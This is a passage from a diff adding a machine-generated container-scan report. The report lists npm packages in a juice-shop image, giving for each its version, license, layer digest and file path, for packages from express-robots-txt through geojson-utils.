"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/express-robots-txt/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "express-security.txt@2.0.0", + "Name": "express-security.txt", + "Identifier": { + "PURL": "pkg:npm/express-security.txt@2.0.0", + "UID": "8f8cb7a6b441eb2e" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/express-security.txt/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ext-list@2.2.2", + "Name": "ext-list", + "Identifier": { + "PURL": "pkg:npm/ext-list@2.2.2", + "UID": "919b23ea5f125e2c" + }, + "Version": "2.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ext-list/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ext-name@5.0.0", + "Name": "ext-name", + "Identifier": { + "PURL": "pkg:npm/ext-name@5.0.0", + "UID": "8cf298e10e489bc6" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ext-name/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "extend@3.0.2", + "Name": "extend", + "Identifier": { + "PURL": "pkg:npm/extend@3.0.2", + "UID": "41b74e3d2f0757c8" + }, + "Version": "3.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/extend/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fast.js@0.1.1", + "Name": "fast.js", + "Identifier": { + "PURL": "pkg:npm/fast.js@0.1.1", + "UID": "33cdd677a04b5d52" + }, + "Version": "0.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fast.js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fd-slicer@1.1.0", + "Name": "fd-slicer", + "Identifier": { + "PURL": "pkg:npm/fd-slicer@1.1.0", + "UID": "29d1a7f06b46ec34" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fd-slicer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fdir@6.5.0", + "Name": "fdir", + "Identifier": { + "PURL": "pkg:npm/fdir@6.5.0", + "UID": "6ea371da3b5d1d49" + }, + "Version": "6.5.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tinyglobby/node_modules/fdir/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "feature-policy@0.6.0", + "Name": "feature-policy", + "Identifier": { + "PURL": "pkg:npm/feature-policy@0.6.0", + "UID": "f24b664f13027dd5" + }, + "Version": "0.6.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/feature-policy/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fecha@4.2.3", + "Name": "fecha", + "Identifier": { + "PURL": "pkg:npm/fecha@4.2.3", + "UID": "7085968babc8bd28" + }, + "Version": "4.2.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fecha/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "file-stream-rotator@1.0.0", + "Name": "file-stream-rotator", + "Identifier": { + "PURL": "pkg:npm/file-stream-rotator@1.0.0", + "UID": "4c0b838c0855d105" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/file-stream-rotator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "file-type@11.1.0", + "Name": "file-type", + "Identifier": { + "PURL": "pkg:npm/file-type@11.1.0", + "UID": "7e8ccecd85376fbf" + }, + "Version": "11.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/download/node_modules/file-type/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "file-type@16.5.4", + "Name": "file-type", + "Identifier": { + "PURL": "pkg:npm/file-type@16.5.4", + "UID": "afda4ee71d7d584a" + }, + "Version": "16.5.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/file-type/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "file-type@3.9.0", + "Name": "file-type", + "Identifier": { + "PURL": "pkg:npm/file-type@3.9.0", + "UID": "2ef5fdc16f5f06a9" + }, + "Version": "3.9.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-unzip/node_modules/file-type/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "file-type@4.4.0", + "Name": "file-type", + "Identifier": { + "PURL": "pkg:npm/file-type@4.4.0", + "UID": "50585fe7689fb1e1" + }, + "Version": "4.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/archive-type/node_modules/file-type/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "file-type@5.2.0", + "Name": "file-type", + "Identifier": { + "PURL": "pkg:npm/file-type@5.2.0", + "UID": "1f6a6ac227493f46" + }, + "Version": "5.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-tar/node_modules/file-type/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "file-type@5.2.0", + "Name": "file-type", + "Identifier": { + "PURL": "pkg:npm/file-type@5.2.0", + "UID": "3784843a5f8866d8" + }, + "Version": "5.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-targz/node_modules/file-type/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "file-type@6.2.0", + "Name": "file-type", + "Identifier": { + "PURL": "pkg:npm/file-type@6.2.0", + "UID": "f4c119b6d215ce4b" + }, + "Version": "6.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-tarbz2/node_modules/file-type/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "file-uri-to-path@1.0.0", + "Name": "file-uri-to-path", + "Identifier": { + "PURL": "pkg:npm/file-uri-to-path@1.0.0", + "UID": "7ad8aab563aa95d" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/file-uri-to-path/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "filename-reserved-regex@2.0.0", + "Name": "filename-reserved-regex", + "Identifier": { + "PURL": "pkg:npm/filename-reserved-regex@2.0.0", + "UID": "ea81b17620975fe" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/filename-reserved-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "filenamify@3.0.0", + "Name": "filenamify", + "Identifier": { + "PURL": "pkg:npm/filenamify@3.0.0", + "UID": "97057a398670f307" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/filenamify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fill-range@7.1.1", + "Name": "fill-range", + "Identifier": { + "PURL": "pkg:npm/fill-range@7.1.1", + "UID": "66cc1856fce1ea47" + }, + "Version": "7.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fill-range/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "finale-rest@1.2.2", + "Name": "finale-rest", + "Identifier": { + "PURL": "pkg:npm/finale-rest@1.2.2", + "UID": "320b701056e1773a" + }, + "Version": "1.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/finale-rest/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "finalhandler@1.3.2", + "Name": "finalhandler", + "Identifier": { + "PURL": "pkg:npm/finalhandler@1.3.2", + "UID": "cfeab950ad526ba8" + }, + "Version": "1.3.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/finalhandler/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "find-up@4.1.0", + "Name": "find-up", + "Identifier": { + "PURL": "pkg:npm/find-up@4.1.0", + "UID": "4b9847b2e2c872fd" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/find-up/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "findup-sync@4.0.0", + "Name": "findup-sync", + "Identifier": { + "PURL": "pkg:npm/findup-sync@4.0.0", + "UID": "7568f4c0b6701f1a" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/liftup/node_modules/findup-sync/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "findup-sync@5.0.0", + "Name": "findup-sync", + "Identifier": { + "PURL": "pkg:npm/findup-sync@5.0.0", + "UID": "f706d68a87e2c4f7" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/findup-sync/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fined@1.2.0", + "Name": "fined", + "Identifier": { + "PURL": "pkg:npm/fined@1.2.0", + "UID": "64357c4ec147bf64" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fined/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "flagged-respawn@1.0.1", + "Name": "flagged-respawn", + "Identifier": { + "PURL": "pkg:npm/flagged-respawn@1.0.1", + "UID": "283b4ccbf010a290" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/flagged-respawn/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fn.name@1.1.0", + "Name": "fn.name", + "Identifier": { + "PURL": "pkg:npm/fn.name@1.1.0", + "UID": "d4f4a25f13e42e84" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fn.name/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fontkit@1.9.0", + "Name": "fontkit", + "Identifier": { + "PURL": "pkg:npm/fontkit@1.9.0", + "UID": "733a34b0554da089" + }, + "Version": "1.9.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fontkit/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "for-each@0.3.5", + "Name": "for-each", + "Identifier": { + "PURL": "pkg:npm/for-each@0.3.5", + "UID": "50589ac3e1ec88c3" + }, + "Version": "0.3.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/for-each/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "for-in@1.0.2", + "Name": "for-in", + "Identifier": { + "PURL": "pkg:npm/for-in@1.0.2", + "UID": "8d20ca123921a2ac" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/for-in/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "for-own@1.0.0", + "Name": "for-own", + "Identifier": { + "PURL": "pkg:npm/for-own@1.0.0", + "UID": "6a2fbcfb367a290d" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/for-own/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "foreachasync@3.0.0", + "Name": "foreachasync", + "Identifier": { + "PURL": "pkg:npm/foreachasync@3.0.0", + "UID": "5a6c8f4a583c887" + }, + "Version": "3.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/foreachasync/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "foreground-child@3.3.1", + "Name": "foreground-child", + "Identifier": { + "PURL": "pkg:npm/foreground-child@3.3.1", + "UID": "c2eb752c7fcf9dfb" + }, + "Version": "3.3.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/foreground-child/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "forwarded@0.2.0", + "Name": "forwarded", + "Identifier": { + "PURL": "pkg:npm/forwarded@0.2.0", + "UID": "7a865a47807b992d" + }, + "Version": "0.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/forwarded/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fresh@0.5.2", + "Name": "fresh", + "Identifier": { + "PURL": "pkg:npm/fresh@0.5.2", + "UID": "9da724ad83ddcbb1" + }, + "Version": "0.5.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fresh/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "from2@2.3.0", + "Name": "from2", + "Identifier": { + "PURL": "pkg:npm/from2@2.3.0", + "UID": "809ee7407b64ed4" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/from2/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "frontend@20.0.0", + "Name": "frontend", + "Identifier": { + "PURL": "pkg:npm/frontend@20.0.0", + "UID": "be2d1cb59594ec45" + }, + "Version": "20.0.0", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/frontend/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fs-constants@1.0.0", + "Name": "fs-constants", + "Identifier": { + "PURL": "pkg:npm/fs-constants@1.0.0", + "UID": "36a12fd0c33d28ff" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fs-constants/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fs-extra@9.1.0", + "Name": "fs-extra", + "Identifier": { + "PURL": "pkg:npm/fs-extra@9.1.0", + "UID": "2e5f4c3f156125d0" + }, + "Version": "9.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fs-extra/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fs-minipass@1.2.7", + "Name": "fs-minipass", + "Identifier": { + "PURL": "pkg:npm/fs-minipass@1.2.7", + "UID": "ef84753fbc9a0d8f" + }, + "Version": "1.2.7", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-pre-gyp/node_modules/fs-minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fs-minipass@2.1.0", + "Name": "fs-minipass", + "Identifier": { + "PURL": "pkg:npm/fs-minipass@2.1.0", + "UID": "9e8db61cae863f36" + }, + "Version": "2.1.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/fs-minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fs-minipass@3.0.3", + "Name": "fs-minipass", + "Identifier": { + "PURL": "pkg:npm/fs-minipass@3.0.3", + "UID": "7f2f8521a0de7acb" + }, + "Version": "3.0.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fs-minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fs.realpath@1.0.0", + "Name": "fs.realpath", + "Identifier": { + "PURL": "pkg:npm/fs.realpath@1.0.0", + "UID": "96437950ad7fb971" + }, + "Version": "1.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fs.realpath/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "fstream@1.0.12", + "Name": "fstream", + "Identifier": { + "PURL": "pkg:npm/fstream@1.0.12", + "UID": "138ff59dd48b6b6c" + }, + "Version": "1.0.12", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/fstream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "function-bind@1.1.2", + "Name": "function-bind", + "Identifier": { + "PURL": "pkg:npm/function-bind@1.1.2", + "UID": "5210f47cf13dc081" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/function-bind/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "functions-have-names@1.2.3", + "Name": "functions-have-names", + "Identifier": { + "PURL": "pkg:npm/functions-have-names@1.2.3", + "UID": "62845c2ceffd3a6" + }, + "Version": "1.2.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/functions-have-names/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "gauge@2.7.4", + "Name": "gauge", + "Identifier": { + "PURL": "pkg:npm/gauge@2.7.4", + "UID": "95d04490eaca091f" + }, + "Version": "2.7.4", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/gauge/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "gauge@4.0.4", + "Name": "gauge", + "Identifier": { + "PURL": "pkg:npm/gauge@4.0.4", + "UID": "69602696872df8d3" + }, + "Version": "4.0.4", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/gauge/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "geojson-utils@1.1.0", + "Name": "geojson-utils", + "Identifier": { + "PURL": 